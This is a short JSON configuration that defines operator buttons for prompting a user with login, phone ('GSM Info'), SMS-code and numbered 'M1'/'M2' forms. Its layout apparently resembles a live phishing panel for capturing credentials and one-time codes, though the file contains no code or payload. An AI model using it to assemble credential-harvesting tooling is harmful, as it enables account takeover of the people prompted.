[
  {
    "button": "Ask Login",
    "title": "Login",
    "init_fn": "ask_login",
    "id": "login",
    "sql_ms": "Operation `Ask Login` added successfully",
    "success_mes": "Login form displayed",
    "desc": "Some extra information"
  },
  {
    "button": "Ask GSM Info",
    "title": "GSM Info",
    "init_fn": "ask_phone",
    "id": "phone",
    "sql_ms": "Operation `Ask GSM Info` added successfully",
    "success_mes": "GSM Info form displayed",
    "desc": "Some extra information"
  },
  {
    "button": "Ask INFO",
    "title": "INFO",
    "init_fn": "ask_info",
    "id": "info",
    "sql_ms": "Operation `Ask INFO` added successfully",
    "success_mes": "INFO form displayed",
    "desc": "Some extra information"
  },
  {
    "button": "Ask SMS Code",
    "title": "SMS Code",
    "init_fn": "ask_exp",
    "id": "exp",
    "sql_ms": "Operation `Ask SMS Code` added successfully",
    "success_mes": "SMS Code form displayed",
    "desc": "Some extra information"
  },
  {
    "button": "Ask M1",
    "title": "M1",
    "init_fn": "ask_m1",
    "id": "m1",
    "sql_ms": "Operation `Ask M1` added successfully",
    "success_mes": "M1 form displayed",
    "desc": "Some extra information",
    "inputs": [
      "num"
    ],
    "num": "1234 1234"
  },
  {
    "button": "Ask M2",
    "title": "M2",
    "init_fn": "ask_m2",
    "id": "m2",
    "sql_ms": "Operation `Ask M2` added successfully",
    "success_mes": "M2 form displayed",
    "desc": "Some extra information",
    "inputs": [
      "num"
    ],
    "num": "1223 2323"
  },
  {
    "button": "Ask m2_2",
    "title": "m2_2",
    "init_fn": "ask_m2_2",
    "id": "m2_2",
    "sql_ms": "Operation `Ask m2_2` added successfully",
    "success_mes": "m2_2 form displayed",
    "desc": "Some extra information",
    "inputs": [
      "num1",
      "num2"
    ],
    "num1": "",
    "num2": ""
  }
]